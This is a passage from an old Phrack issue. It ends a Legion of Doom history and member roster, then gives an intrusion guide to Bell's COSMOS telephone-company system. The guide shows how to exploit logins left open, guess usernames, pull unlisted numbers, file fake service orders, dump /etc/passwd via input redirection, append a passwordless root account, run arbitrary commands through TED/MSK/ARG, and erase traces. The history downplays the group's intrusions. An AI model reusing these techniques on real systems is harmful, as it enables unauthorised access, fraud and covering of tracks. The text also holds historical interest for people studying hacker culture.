  667. around Summercon of 1988, where several new members were admitted by those
  668. LOD members attending the festivites.  The third phase is now at an end
  669. brought on by busts and related paranoia, again, two years after its onset.
  670. There is no indication that points to any resurgence in the future, but
  671. nothing is certain until summer.
  672. Since its creation, LOD has tried to put out informative files on a wide
  673. variety of topics of interest to its contemporaries.  These files ranged from
  674. the first actual scanned directory of Telenet, to files on various operating
  675. systems.  The LOD Technical Journal was to be a semi-regular electronic
  676. magazine comprised of such files, and other items of interest to the hacking
  677. community.  Only three issues of the Technical Journal were produced.  As
  678. the fourth issue was being pieced together, several members were raided, and
  679. work on it was abandoned.
  680. >From the time it was formed continuing up to the present, the Legion of
  681. Doom has been quite a topic of controversy in the computer underground and
  682. with computer security professionals.  The Legion of Doom has been
  683. called everything from "Organized Crime" to "a Communist threat to national
  684. security" to "an international conspiracy of computer terrorists bent
  685. on destroying the nation's 911 service."  Nothing comes closer to the
  686. actual truth than "bored adolescents with too much spare time."
  687. LOD members may have entered into systems numbering in the tens of
  688. thousands, they may have peeped into credit histories, they may
  689. have monitored telephone calls, they may have snooped into files and
  690. buffered interesting text, they may still have total control over
  691. entire computer networks; but, what damage have they done?  None, with
  692. the exception of unpaid use of CPU time and network access charges.  What
  693. personal gains have any members made?  None, with the exception of three
  694. instances of credit fraud that were instigated by three separate greedy
  695. individuals, without group knowledge.
  696. The Legion of Doom will long be remembered in the computer underground as
  697. an innovative and pioneering force, that consistently raised the collective
  698. level of knowledge, and provided many answers to questions ranging from the
  699. workings of the telephone system to the structure of computer operating
  700. systems.  No other group dedicated to the persuit of computer and
  701. telecommunications knowledge has survived longer, and none probably will.
  702. The Legion of Doom  1984--1990
  703. ------------------------------------------------------------------------------
  704.  
  705. Alumni of the Fraternal Order of the Legion of Doom  (Lambda Omega Delta)
  706. Handle                Entered   Exited    Location       Reasons for leaving
  707. ------------------------------------------------------------------------------
  708. Lex Luthor            Early 84--          Florida
  709. Karl Marx             Early 84--Late  85  Colorado       Bust w/Tabas..College
  710. Mark Tabas            Early 84--Late  85  Colorado       Too numerous to list
  711. Agrajag the Prolonged Early-84--Late  85  California     Loss of Interest
  712. King Blotto           Early 84--Late  85  Ohio           College
  713. Blue Archer           Early 84--Late  87  Texas          College
  714. EBA         Early 84--          Texas
  715. The Dragyn            Early 84--Late  86  Minnesota      Loss of Interest
  716. Unknown Soldier       Early 84--Early 85  Florida        Bust-Toll Fraud
  717. Sharp Razor           Late  84--Early 86  New Jersey     Bust-Compuserve Abuse
  718. Sir Francis Drake     Late  84--Early 86  California     Loss of Interest
  719. Paul Muad'dib         Late  84--Early 86  New York       Modem Broke
  720. Phucked Agent 04      Late  84--Late  87  California     College
  721. X-Man                 Late  84--Mid   85  New York       Bust-Blue Boxing
  722. Randy Smith           Late  84--Mid   85  Missouri       Bust-Credit Fraud
  723. Steve Dahl            Early 85--Early 86  Illinois       Bust-Credit Fraud
  724. The Warlock           Early 85--Early 86  Florida        Loss of Interest
  725. Terminal Man          Early 85--Late  85  Massachusetts  Expelled from Group
  726. Dr. Who               Early 85--Late  89  Massachusetts  Several Reasons
  727. The Videosmith        Early 86--Late  87  Pennsylvania   Paranoia
  728. Kerrang Kahn          Early 86--Mid   89  London, UK     Loss of Interest
  729. Gary Seven            Early 86--Mid   88  Florida        Loss of Interest
  730. The Marauder          Early 86--Mid   89  Connecticut    Loss of Interest
  731. Silver Spy            Late  86--Late  87  Massachusettts College
  732. Bill from RNOC        Early 87--Late  87  New York       Bust-Hacking
  733. The Leftist           Mid   87--Late  89  Georgia        Bust-Hacking
  734. Phantom Phreaker      Mid   87--          Illinois
  735. Doom Prophet          Mid   87--          Illinois
  736. Jester Sluggo         Mid   87--          North Dakota
  737. Carrier Culprit       Mid   87--Mid   88  Pennsylvania   Loss of Interest
  738. Master of Impact      Mid   87--Mid   88  California     Loss of Interest
  739. Thomas Covenant       Early 88--Early 90  New York       Bust-Hacking
  740. The Mentor            Mid   88--Early 90  Texas          Retired
  741. Necron 99             Mid   88--Late  89  Georgia        Bust-Hacking
  742. Control C             Mid   88--Early 90  Michigan
  743. Prime Suspect         Mid   88--          New York
  744. The Prophet           Mid   88--Late  89  Georgia        Bust-Hacking
  745. Phiber Optik          Early 89--Early 90  New York       Bust-Hacking
  746. ** AKA **
  747. Randy Smith           Poof!
  748. Dr. Who               Skinny Puppy
  749. Kerrang Kahn          Red Eye
  750. Phantom Phreaker      ANI Failure / Psychedelic Ranger
  751. Doom Prophet          Trouble Verify
  752. Thomas Covenant       Sigmund Fraud / Pumpkin Pete
  753. Necron 99             The Urvile
  754. Control C             Phase Jitter
  755.  
  756. _______________________________________________________________________________
  757.                                 ==Phrack Inc.==
  758.                   Volume Three, Issue Thirty-one, Phile #6 of 10
  759.  
  760.                         L    OO  DD
  761.                         L   O  O D D
  762.                         LLL  OO  DD
  763.                           PRESENTS
  764. ************************************************************
  765. ************************************************************
  766. ***                                                      ***
  767. ***                     TTT H H EEE                      ***
  768. ***                      T  H H E                        ***
  769. ***                      T  HHH EEE                      ***
  770. ***                      T  H H E                        ***
  771. ***                      T  H H EEE                      ***
  772. ***                                                      ***
  773. ***                                                      ***
  774. ***      DD   EEE FFF III N  N III TTT III V V EEE       ***
  775. ***      D D  E   F    I  NN N  I   T   I  V V E         ***
  776. ***      D  D EEE FFF  I  N NN  I   T   I  V V EEE       ***
  777. ***      D D  E   F    I  N NN  I   T   I  V V E         ***
  778. ***      DD   EEE F   III N  N III  T  III  V  EEE       ***
  779. ***                                                      ***
  780. ***                                                      ***
  781. ***          CCCC  OOO    SS  M   M  OOO    SS           ***
  782. ***         C     O   O  S  S MM MM O   O  S  S          ***
  783. ***         C     O   O   S   M M M O   O   S            ***
  784. ***         C     O   O S  S  M M M O   O S  S           ***
  785. ***          CCCC  OOO   SS   M   M  OOO   SS            ***
  786. ***                                                      ***
  787. ***                                                      ***
  788. ************************************************************
  789. ************************************************************
  790.                              BY
  791.                         ERIK BLOODAXE
  792. PRELUDE
  793. In the past, many files have been written about COSMOS.  I
  794. have always been rather disappointed in their quality and in
  795. their presentation, so I have taken on the responsibility of
  796. doing one myself.  This should sum up COSMOS for everyone who
  797. reads it.  It contains formats for very useful commands, an
  798. entire transaction list, COSMOS "tricks", and a list of all COSMOS
  799. abbreviations and their formats.
  800. =============================================================================
  801. INTRODUCTION
  802. Bell Labs COmputer System for Mainframe OperationS  (COSMOS)
  803. is basically just a database for maintaining records of
  804. equipment and other line information and generating reports
  805. on that information.  The system is usually set up on a DEC
  806. PDP 11/45 or 11/70.
  807. The main responsibilities of the COSMOS system are:
  808.               Maintaining records
  809.               Issuing reports
  810.               Processing service and work orders
  811.               Assigning telephone numbers
  812.               Load balancing for switching computers
  813.               Output of ESS recent change information
  814. LOGGING ON
  815. When connecting to COSMOS the system will respond with:
  816. ;Login:  or  LOGIN:
  817. at which point you enter a username.  The system will then
  818. prompt:
  819. PASSWORD:
  820. at which point you enter the password for that username.
  821. Finally, the system will prompt:
  822. WC?
  823. which asks you to enter the wire center for the exchange you
  824. will be using in your work.  After successfully completing
  825. the login sequence you will be given the system prompt which
  826. will be the two letter id of the wire center you entered and a
  827. percent sign:  "WC% "
  828. To log off at this or at any point you can type control-y.
  829. One of the major flaws in COSMOS security is that unless a
  830. control-y is received the terminal is not logged out, even if
  831. the user disconnects.  Many times when you connect to COSMOS,
  832. you will be dropped right into the "WC% " prompt.  This even
  833. happens on major BOC packet networks quite often.  If you are
  834. lucky enough to receive a 'WC#' prompt you have access to the
  835. COSNIX shell, and can issue various unix-like commands, like
  836. ls, cd, cat, et cetera.
  837. COSMOS usernames are usually issued as two letters corresponding to
  838. whatever center will be using that account, and two numbers.
  839. EX:  LA01
  840. Using the above example "LA01" there will most probably be numerous
  841. "LA" accounts, possibly "LA01" through "LA15" or higher.  This is true
  842. for most COSMOS usernames.  More often than not, all accounts used by the
  843. same center will have the same password as well.  Some common usernames
  844. and their owners are:
  845.               ROOT     System Manager
  846.               SYS      System Manager
  847.               ML       Loop Assignment
  848.               LA       Loop Assignment
  849.               DN       Main Distributing Frame
  850.               IN       Repair Service
  851.               RS       Repair Service
  852.               CE       LNAC
  853.               LK       Account to execute INQuiries only
  854.               JA       Mizar
  855.               WLI      Work Load Indicator
  856. Usernames may vary from BOC to BOC, but these are fairly standard.
  857. =============================================================================
  858. COSMOS TRANSACTION COMMANDS
  859. COSMOS commands are three letter acronyms.  I will explain in
  860. depth the commands I have found most useful, and then list
  861. the remainder.  Remember, do not attempt to learn the formats for COSMOS
  862. transactions online.  You will probably not figure out correct inputs, and
  863. will most likely cause problems for the system manager and yourself.
  864. Commands are entered in a specific ways.  The command desired is
  865. entered at the WC% prompt.  A second string of data is entered at
  866. the next line which designates the type of transaction desired.
  867. This line is prefixed with on of the following four letters:
  868. H - Header Line
  869. I - In Line
  870. O - Out Line
  871. R - Remark Line
  872. The most commonly used line is the H line.  It is a required input in
  873. almost all COSMOS transactions.  From the second line on, COSMOS will
  874. prompt with an underscore "_" as the system prompt, to let the user
  875. know that it is waiting for input.  When all needed data has been entered,
  876. the command is executed by typing a "." at the beginning of a new line.
  877. If you wish to process a command, but stay in command level in order to
  878. process further commands after the one you are currently entering has
  879. finished, a ";" can be entered at the beginning of a new line.
  880. To cancel the transaction you are entering, a "Q" should be entered at
  881. the beginning of a new line.  To interrupt output, the break character
  882. is "^C".  When entering criteria, you may enter all like data (all H-line, all
  883. I-line, etc...) on one line using a "/" between input prefixes:
  884. EX:  H TN 222-0000,222-9999/RMKT SWBT?/US 1FB
  885. is the same as entering:
  886. H TN 222-0000,222-9999
  887. _H RMKT SWBT?
  888. _H US 1FB
  889. One of the most commonly used commands is INQ (Complete
  890. Circuit Inquiry).  There is also a short form of INQ called
  891. ISH.  This command requires only the use of H lines.  Multiple H lines
  892. can be entered to narrow a search or to print multiple reports.
  893. Valid H line facilities used are:
  894.               BL       Bridge Lifter
  895.               CON      Concentrator
  896.               CP       Cable Pair
  897.               CKID     Circuit ID
  898.               MR       Message Register
  899.               OE       Office Equipment Number
  900.               PL       Private Line Circuit Number
  901.               TK       Trunk Cable and Pair Number
  902.               TN       Telephone Number
  903.               TP       Tie Pair
  904.               XN       "X" Number
  905.               TRE      Transmission Equipment
  906.               TER      Terminal Number
  907.               GP       Group Number
  908.               ORD      Work Order
  909. EX:  To print information on telephone number 222-2222
  910. WC% INQ
  911. H TN 222-2222
  912. _.
  913. EX:  To print information on cable pair 11-1111
  914. WC% INQ
  915. H CP 11-1111
  916. _.
  917. INQ will print a full report whatever circuit you examine, while ISH
  918. will print a shorter, easier to read report.  Below is an actual ISH
  919. done on a Telenet node.
  920. CA% ISH
  921. H TN 225-8004
  922. _.
  923. TN   225-8004
  924.      ST  AU          DATE 06-03-83   HT GP 0-0081    BTN 225-8004    TYPE X
  925. OE   006-012-200
  926.      ST  WK          DATE 03-04-86   CS 1FBH     US 1BH       FEA TNNL
  927.      LCC TF2
  928.      LOC WF12003
  929. TER  0-0081-0001
  930.      ST  WK
  931.      RMKG GTE.TELENET
  932. CP   95-0701
  933.      ST  WK          DATE 01-24-86    RZ 13
  934.      LOC WF12009
  935. TP   6105-0910
  936.      ST  WK          DATE 01-24-86
  937.      LOC  F12003
  938.      LOC  F42001
  939.      FROM FAC OE  006-012-200     TO FAC TP  6206-0107
  940. TP   6206-0107
  941.      ST  WK          DATE 01-24-86
  942.      LOC  F22029
  943.      LOC  F42002
  944. HUNT SEQUENCE FOR TN 225-8004
  945.   TER 0001-0040
  946. ** ISH COMPLETED 02-29-99  12:00
  947. CA%
  948. When you pull an inquiry on a number that you are interested in, you will
  949. be given its cable pair, its order number, any numbers that connect to
  950. it through a hunt sequence, and you will see any remarks entered about the
  951. number.  This information can prove to be very valuable.  For instance:
  952. You suspect that a company has a modem online, yet you don't want to waste
  953. time sequentially dialing thousands of numbers.  You can simply enter
  954. an ISH on the number to get its cable pair, then begin pulling ISH
  955. reports on cable pairs close to the main one.  Then you need only dial
  956. twenty or so numbers that are in the same area as the main number, and
  957. you will find the computer.
  958. Another extremely valuable command is SIR (Sorting Inquiry by Range).
  959. With SIR, you can print the circuit information on all lines that match
  960. specified criteria within a specified range of numbers.  This command
  961. requires only H line input, but numerous lines may be entered in order to
  962. narrow down the search.  You may also use the wildcard character ("?") to
  963. encompass a larger range when doing a SIR.  There are many applications
  964. for SIR, but I will only show examples on a few I have found to be
  965. most useful.
  966. Many times entries have special remarks entered about the circuit.  These
  967. are usually entered as RMKT (Remarks on Telephone Number), but they may be
  968. entered as RMKO (Remarks on Office Equipment) or RMKP (Remarks on Cable
  969. Pair), depending upon what the person entering felt like typing.
  970. Most of the time the remarks really don't correspond like they should.
  971. Telephone companies are pretty thorough about remarking on a line that
  972. they own and they will usually use the RMKT prefix.
  973. EX:  To find all telephone company (Southwestern Bell) lines in prefix 222
  974. WC% SIR
  975. H TN 222-0000,222-9999
  976. _H RMKT SWBT?
  977. _.
  978. The "?" after SWBT acts as a wildcard.  Typing SWB? would perform the same
  979. search.
  980. You may also want to search by STT (Telephone number status).  Some types of
  981. STT are:
  982.               AU   Auxiliary
  983.               NP   Non-published
  984.               OF   Official (telco owned)
  985.               TS   Test
  986. Another way to distinguish types of number is by CS (Customer Class of
  987. Service).  CS values tend to vary from BOC to BOC, but business lines
  988. will usually look like "1FB", or at least contain a "B".  Residences
  989. will usually look like "1FR."  Sometimes telco lines are listed as "1OF",
  990. but may also be entered as "1FB".  On lines in a hunt group, the CS will
  991. be appended with the letter "H", as "1FBH".
  992. Let's say a company owns a block on an exchange (333) running from 1000 to
  993. 3500.  You want to find all possible computer numbers in that area.  Chances
  994. are good that they are not listed.
  995. EX:
  996. WC% SIR
  997. H TN 333-1000,333-3500
  998. _H STT NP
  999. _H CS 1FB
  1000. _.
  1001. The above would list all non-published business numbers from 333-1000
  1002. to 333-3500.
  1003. To find all numbers that are translated 800 numbers in the same prefix range
  1004. as above, you can do the following:
  1005. EX:
  1006. WC% SIR
  1007. H TN 333-1000,333-3500
  1008. _H PL ?800?
  1009. _.
  1010. This will prints reports on all private lines registered as 800 numbers.
  1011. There is also a shorter version of SIR, LTN (List Telephone Numbers), and a
  1012. more detailed version, GFR (General Facility Report), but I have found
  1013. SIR to be the better of the three to use for my purposes.
  1014. In order to change line attributes, or to create new lines you will need
  1015. to use two commands SOE (Service Order Entry), and RCP (Recent Change
  1016. Packager).  These two commands are pretty detailed in what they can do,
  1017. so I will just cover a few of their options.
  1018. SOE will allow you to assign a new circuit, and specify the desired telephone
  1019. number, custom calling features, billing telephone number, etc.
  1020. SOE requires both "H" and "I" lines of input.  The best way to enter
  1021. a new service order is to have COSMOS pick your new telephone number and
  1022. assign the needed office equipment number.  If you want to pick your own
  1023. telephone number, the number you pick must have a status (STO) of SP, LI, RS,
  1024. or PD (with a disconnect date before the due date on your new service order).
  1025. This is so that you do not try to assign a number that is currently working
  1026. to your new service order.  You can check this by doing an ISH on all the
  1027. variations of numbers you desire, and checking the STO.  You can also get a
  1028. list of available numbers in a given prefix using the NAI command.  You
  1029. should also do a SIR of recent entries, to try to find the proper format of
  1030. order numbers, so that you do not reuse one, or make one up that is formatted
  1031. incorrectly.  Another method to make sure that you have the correct formatting
  1032. of order numbers is to call the phone company and request the installation of
  1033. a line in the area you are working in.  They will tell you your service order
  1034. number for reference.  Later, you can merely cancel the order.  You will also
  1035. have to find a valid cable pair, so do an ISH on whatever number written in
  1036. your junction box that is not working, and then make sure there is no pending
  1037. connect orders entered on it.
  1038. To enter a service order for a new connection, having COSMOS pick an available
  1039. telephone number and assign proper office equipment numbers, you would do
  1040. the following:
  1041. EX:
  1042. WC% SOE
  1043. H ORD SO123456/OT NC/DD DD-MM-YY   (Use valid Day, Month, Year for Due Date)
  1044. _I TN ?/US 1FR/FEA TNNL/OE ?/CP XX-YYYY   (Use valid cable pair for XX-YYYY)
  1045. _.
  1046. You would now need to enter RCP and make a correctly formatted recent change
  1047. report for the order you entered so RCMAC can pick up the order and directly
  1048. enter it into the switch.  What RCP does is take your order and change it into
  1049. actual switch programming, using templates that are stored in directories
  1050. corresponding to what type of switching equipment is used for that WC.
  1051. (EX:  ess5a)
  1052. EX:  To create a recent change package for the order entered above
  1053. WC% RCP
  1054. H ORD SO123455
  1055. _.
  1056. Using SOE you can specify custom calling features, you can specify billing
  1057. telephone numbers, you can establish service as coin, and several other
  1058. options by adding "I" line information corresponding to that particular
  1059. option.
  1060.               _I CCF XXXXXX       (XXXXXX is valid custom calling features)
  1061.               _I BTN NNX-XXXX     (NNX-XXXX is valid billing TN)
  1062.               _I TT C
  1063. To get a list of spare (available) telephone numbers in a given prefix, you
  1064. can use the NAI (Telephone Number Assignment Inquiry) command.  You only need
  1065. enter H line criteria.  In addition to searching by prefix (NNX), you can
  1066. search by switch type (TYP), or rate zone (RTZ).
  1067. EX:  To select one spare telephone number in 555 and make it reserved status
  1068. WC% NAI
  1069. H TT X/NNX 555/STT RS
  1070. _.
  1071. You may also have NAI print out several available numbers, however, you cannot
  1072. change the status unless you are printing one listing.
  1073. EX:
  1074. WC% NAI
  1075. H TT X/NNX 555/LC XX        (Where XX is a number between 1 and 25)
  1076. _.
  1077. To get a listing of all prefixes that exist in the Wire Center you are
  1078. logged in under, you can use the command DDS (Display DS Table).  This
  1079. command will list the ranges that exist for a given input.
  1080. To list all telephone numbers in a given WC:
  1081. WC% DDS
  1082. H TN ?
  1083. _.
  1084. To list all cable pair ranges:
  1085. WC% DDS
  1086. H CP ?
  1087. _.
  1088. To change from one Wire Center to another, you use the command WCC (Wire
  1089. Center Change).  This is a very straight forward command.
  1090. EX:
  1091. WC% WCC NW
  1092. NW%
  1093. To allow for redirection in your COSMOS commands, you must execute the
  1094. DIO command.  This command is rather important for manipulating commands
  1095. to work for you.
  1096. EX:
  1097. WC% DIO
  1098. To see what transactions other people logged in are running, you can use the
  1099. command TSNAP (on certain generics)
  1100. EX:
  1101. WC% TSNAP
  1102. There are about one hundred other COSMOS commands that are all defined at the
  1103. end of this file.  I cannot go into detail on all of them but I will list them
  1104. and their meanings.
  1105. =============================================================================
  1106. COSMOS TRICKS
  1107. Even if you don't have full COSNIX access, you can basically execute
  1108. any command or read any file that exists in the system.  Using the INQ
  1109. (or ISH) command and redirection, you can open and display any file.
  1110. EX:  To display the password file
  1111. WC% INQ </ETC/PASSWD
  1112. This will display the file, however, since this is a flaw in the command,
  1113. it thinks the file is to be input for INQ, and each line will be preceded
  1114. with "ILLEGAL LINE TYPE", but this can be ignored.
  1115. Other files to look at:
  1116. /USR/FACS/WCFILE     List of all Wire Centers
  1117. /ETC/MATRIX.P        Permission Matrix (Who can execute what commands)
  1118. You may or may not want to try the following.  There is a high probability
  1119. that you will be noticed on the system.  If your local COSMOS ports are
  1120. usually left logged in, don't bother doing this.  However, if your COSMOS
  1121. ports are always logged out, and you almost never get in, and you happen
  1122. to stumble upon one left logged for the first time in months, it might be
  1123. worth a try.
  1124. There are a few ways to make a new account on COSMOS; however, you need to
  1125. be able to write to the password file.  Some systems allow this, but most do
  1126. not.
  1127. The easiest way involves using the echo command and redirection.
  1128. EX:
  1129. WC% echo "EB01::0::y:1:/tmp:/usr/cosmos:/usr/preop:/usr/so" >>/etc/passwd
  1130. This will add user EB01 to the end of the password file.
  1131. If you do not have access to echo you can do the same thing using the TED
  1132. command (Text Editor).
  1133. WC% TED >>/etc/passwd
  1134. S.O. NO.= SO123456
  1135. IS THIS A NEW S.O. (Y on NO) Y
  1136. 1d
  1137. a
  1138. EB01::0::y:1:/tmp:/usr/cosmos:/usr/preop:/usr/so
  1139. ^C
  1140. 1p
  1141. w
  1142. q
  1143. After executing the above, you will need to clean up the /etc/passwd
  1144. file to remove the Service Order information put in there by TED.  You will
  1145. also need to remove the service order you created from the /usr/so/WC
  1146. directory.
  1147. If you cannot find a way to get shell access, you can still execute
  1148. any COSNIX command you desire again using TED, MSK (Output a Transaction
  1149. Mask), and ARG (Assemble and Run a Given Master File).
  1150. EX:
  1151. WC% TED
  1152. S.O. NO.= SO123456
  1153. IS THIS A NEW S.O. (Y or NO) Y
  1154. 12
  1155. 1d
  1156. a
  1157. $*
  1158. run!
  1159. ^c
  1160. w
  1161. q
  1162. WC% MSK >/usr/so/newcmd
  1163. SO123456
  1164. WC% ARG
  1165. newcmd ls /etc
  1166. To execute the command, you need to do ARG, then the name of the
  1167. file (which I called newcmd), then the COSNIX command you wish to
  1168. execute.
  1169. If you can use echo this can be done much easier.
  1170. EX:
  1171. WC% echo '$*' >/usr/so/newcmd
  1172. WC% echo 'run!' >>/usr/so/newcmd
  1173. Then you can run your command normally with ARG.
  1174. WC% ARG
  1175. newcmd cd ..
  1176. IF you do not have access to echo, create a newcmd file and you can use it
  1177. that way.
  1178. WC% ARG
  1179. newcmd echo EB01::0::y:1:/tmp:/usr/cosmos:/usr/so:/usr/preop >>/etc/passwd
  1180. =============================================================================
  1181. COSMOS COMMAND LISTING
  1182. ACE  Establish an Assignment Change Ticket
  1183. AIT  ANALIT Initialization of Tables
  1184. ARG  Assemble and Run a Given Master File
  1185. AUD  Assignment List Audit
  1186. BAI  Bridge Lifter Assignment Inquiry
  1187. BYF  Display the Bypass File
  1188. BYP  Change the Contents of the Bypass File
  1189. CAY  Create an Assembly
  1190. CCA  Change Customer Attributes
  1191. CCT  Initialize and Update the Contractor-Transducer File
  1192. CDA  Change Distribution Attributes
  1193. CDD  Change Due Date
  1194. CDR  Cut Thru DIP Report
  1195. CFA  Change Facility Attributes
  1196. CFP  Print the Class of Service/Features for an Electromechanical Entity
  1197. CFU  Change Facility Usage
  1198. CIE  Company Establish Company Initiated Change
  1199. CLI  COSMOS Processed ALIT Reports
  1200. CPI  COSMOS-PREMIS Interface
  1201. CPM  COSMOS Performance Monitor
  1202. CTC  Complete a Cable Transfer or Complete a Cable Throw
  1203. CTE  Cable Throw Order Establishment
  1204. CTF  Display the Contacter-Transducer File
  1205. CTL  Cable Throw with Line Equipment Assignment
  1206. CTM  Cable Throw Modification
  1207. CTP  Print Cable Transfer Frame Work
  1208. CTR  Cable Throw Replacement
  1209. CTS  Cable Throw Summary
  1210. CTW  Withdraw a Cable Transfer or a Cable Throw
  1211. CUP  Common Update Processor
  1212. CXC  Complex Service Order Input Checker
  1213. CXM  Centrex Table Management
  1214. CXT  Complex Order Inquiry for NAC Review
  1215. DAY  Delete an Assembly
  1216. DBL  Data Base Load
  1217. DCN  List Disconnected and Changed Numbers
  1218. DDS  Display the DS Table
  1219. DIR  Standard DIP Report
  1220. DPN  DIP Purge Number
  1221. DPR  DIP Report and Removal
  1222. DQR  Design Quota System Report
  1223. DQS  Design Quota System
  1224. DTE  Print Current Date
  1225. EDZ  Facility Emergency Assignment List
  1226. ELA  Entity Load Analysis
  1227. ESP  Print Entire Summary Table
  1228. FDY  Set Fiscal Day for LAC
  1229. FLR  Frame Layout Report
  1230. FOR  Frame Order Report
  1231. FOS  Frame Operations Summary
  1232. FTA  Frame Transfer Analysis
  1233. FTC  Frame Transfer Completion
  1234. FTE  Frame Transfer Establishment
  1235. FTL  Frame Transfer LETs
  1236. FTR  Frame Transfer Reprint
  1237. FTW  Frame Transfer Withdrawal
  1238. FWM  Frame Work Management
  1239. GFR  General Facility Report
  1240. GLA  Generate Lists for Assignment
  1241. HBS  Hunt Group Blocks of Spares
  1242. HGR  Hunt Group Report
  1243. HGS  Hunt Group Summary
  1244. HIS  Hunting ISH
  1245. IJR  Input a Jeopardy Reason
  1246. IMU  Input Measured CCS Usage Data
  1247. INQ  Complete Circuit Inquiry
  1248. ISF  Inquire on a Single Facility
  1249. ISH  Complete Circuit Inquiry Short
  1250. JAM  Jumper Activity Management
  1251. JPH  Jumper Placement History
  1252. KPR  Killer Pair Report
  1253. KSM  Create a Transaction Mask
  1254. LAI  Line Equipment Assignment Inquiry
  1255. LBP  Load Balance Parameters
  1256. LCD  LIST Cable Summary, LIT Demand Test
  1257. LCP  List Cable Pairs
  1258. LEE  NAC Related Line Equipment Transfer Order Establishment
  1259. LEW  Line Equipment Transfer Withdrawal
  1260. LFC  Load Factor Calculation
  1261. LFR  Line Failure Report
  1262. LGN  List Hunt Groups
  1263. LIN  Transmit ALIT Data to COSMOS
  1264. LOE  List Originating Line Equipment
  1265. LSE  Line and Station Transfer Order Establishment
  1266. LSW  Line and Station transfer Withdrawal
  1267. LTN  List Telephone Numbers
  1268. MAL  Manual Assignment List
  1269. MAP  Manual Assignment Parameters
  1270. MAQ  Manual Assignment File Inquiry
  1271. MAY  Modify an Assembly
  1272. MCE  Establish a Maintenance Change Ticket
  1273. MCH  Manually Change Hunt
  1274. MCL  Maintenance Change List
  1275. MCR  Establish a Maintenance Change Repair
  1276. MCW  Maintenance Change Ticket Withdrawal
  1277. MDC  Manually Disconnect a Working Circuit
  1278. MEC  Manually Establish a Circuit
  1279. MMC  Manually Modify a Circuit
  1280. MOC  MOE Order Completion
  1281. MOE  Mass OE Transfers
  1282. MOF  Mass OE Frame Transfer Listings
  1283. MOW  MOE Order Withdrawal
  1284. MPK  Modify Work Package
  1285. MSK  Output a Transaction Mask
  1286. MTR  Manually Test a Response
  1287. NAI  Telephone Number Assignment Inquiry
  1288. NOL  NAC Service Order Listing
  1289. NSD  Number Summary Display
  1290. OIJ  Orders in Jeopardy
  1291. OPN  Open-of-Day Report
  1292. OPU  Outside Plant Cable Usage
  1293. PAK  Work Packages
  1294. PEP  Position Establishment for Parties
  1295. PFR  Party Line Fill Report
  1296. PRP  Periodic Purging of Remarks
  1297. QEX  Question an Execution
  1298. QUE  Queue
  1299. RAL  Relay Assignment List
  1300. RAP  Relay Assignment Parameters
  1301. RAS  Release Sequence Number Lists and Related TN/OE
  1302. RBS  Print TBS Relays Assignment Record
  1303. RCP  Recent Change Packager
  1304. RCR  Recent Change Report
  1305. RCS  Recent Change Summary
  1306. RED  Recent Change Message Text Editor
  1307. REL  Release Non-Intercepted Numbers by Release Date
  1308. REM  Remove Frame Locations
  1309. RET  Retermination of Frame Locations
  1310. REX  Reexecute a Service Order
  1311. RJR  Remove Jeopardy Reason Codes
  1312. RMP  Recent Change Punctuation Table
  1313. RNA  Release Telephone Numbers for Assignment
  1314. ROE  Reservation Order Establishment
  1315. ROI  Reservation Order Inquiry
  1316. ROW  Reservation Order Withdrawal
  1317. RTH  Report Transaction to Count Spare and DIPed Line Equipment
  1318. RTS  Relay and Telephone Number Status Report
  1319. RUP  Request Unsolicited Processing
  1320. SAI  Summary of Action Items
  1321. SCA  Service Order Completion-Automatic
  1322. SCF  Simple Completion for MDF
  1323. SCI  Spare Cable Pair Inquiry
  1324. SCM  Standard Completion by MDF
  1325. SCP  Service Order Completion by LAC
  1326. SCR  Standard Completion by RCMAC
  1327. SEL  Selecting Lines for an Exchange Class of Service Study
  1328. SET  Statistics on Equipment and Telephone Numbers
  1329. SGH  Supply Relays for Groups of 5XB Hunts
  1330. SIR  Sorting Inquiry by Range
  1331. SLC  Subscriber Line Counts for Custom Calling Features
  1332. SOC  Service Order Cancel
  1333. SOE  Service Order Establishment
  1334. SOF  Service Order Fix
  1335. SOH  Service Order Withheld
  1336. SOI  Service Order Assignment Inquiry
  1337. SOL  Service Order Listing
  1338. SOM  Modify a Pending Service Order
  1339. SOW  Service Order Withdrawal
  1340. STN  Summarize Telephone Numbers
  1341. SVL  Service Observing Loops
  1342. TAI  Tie Pair Assignment Inquiry
  1343. TAT  Test Alignment of Frame Terminal
  1344. TED  Text Editor
  1345. TET  Display or Change Band Filter File, Retention Factor and Print Threshold
  1346. TFC  Transfer Frame Changes
  1347. TIG  Dial Transfer Input Generator
  1348. TLC  Translate LANAVAR/CPS
  1349. TNS  Telephone Number Swap
  1350. TOC  Transfer Order Completion
  1351. TOE  Transfer Order Establishment
  1352. TOF  Mass OE Transfer Order Frame Listings
  1353. TOI  Dial Transfer Order Inquiry
  1354. TOL  Transfer Order Lists
  1355. TOO  Transfer Order Omissions
  1356. TOW  Transfer Order Withdrawal
  1357. TPU  Tie Pair Usage Report
  1358. TRC  Transfer Order Recent Change Report
  1359. TRI  Transmission Equipment Assignment Inquiry
  1360. TRW  Total Reservation Order Withdrawal
  1361. TSL  Line Equipment Summary Report
  1362. TSN  Traffic Statistics on Telephone Numbers
  1363. TSW  Total Service Order Withdrawal
  1364. TTY  Get TTY Name
  1365. TXC  Text Checker
  1366. TXM  Transfer Centrex Management
  1367. UDP  Update DIP Parameters
  1368. UES  Update the Entity Summary Table
  1369. UFO  Unprinted Frame Orders
  1370. UPC  Update CCS vs. Class of Service Table
  1371. USL  List USOC (US) File Data
  1372. UTC  Update Table for Concentrator Redesign
  1373. WCC  Change Wire Center
  1374. WCT  Worksheet for Cable Throw Orders
  1375. WFL  Working Frame Location
  1376. WOI  Work Order Inquiry
  1377. WOL  Work Order Listing
  1378. WPT  Work Package Table
  1379. WSL  Work Status List
  1380. WUL  Work Unit Report for Subscriber Line Testing and Installation Assignment
  1381. =============================================================================
  1382. COSMOS ABBREVIATIONS AND FORMATS
  1383. The following will be given as follows:
  1384. Prefix and Meaning
  1385. Format
  1386. Code Value and Meaning
  1387. AC   Assembly category
  1388.      AC XXXX
  1389.      PERM=Permanent Facility Assemblies
  1390.      TEMP=Temporary Facility Assemblies
  1391. AC   Assembly Code
  1392.      AC XXX
  1393.      XXX=1-999
  1394. ADSR Administration of Designed Services Review
  1395.      ADSR X
  1396.      Y=Yes, TIRKS Circuit
  1397.      N=No, COSMOS Circuit
  1398. AGM  Normal Aging Months
  1399.      AGM XX
  1400.      XX=Number of Months
  1401. AGT  Accelerated Aging Type
  1402.      AGT XXX
  1403.      BUS=Business
  1404.      RES=Residential
  1405. AI   Assigner's Initials
  1406.      AI XXX
  1407.      XXX=3 Alphanumeric Characters
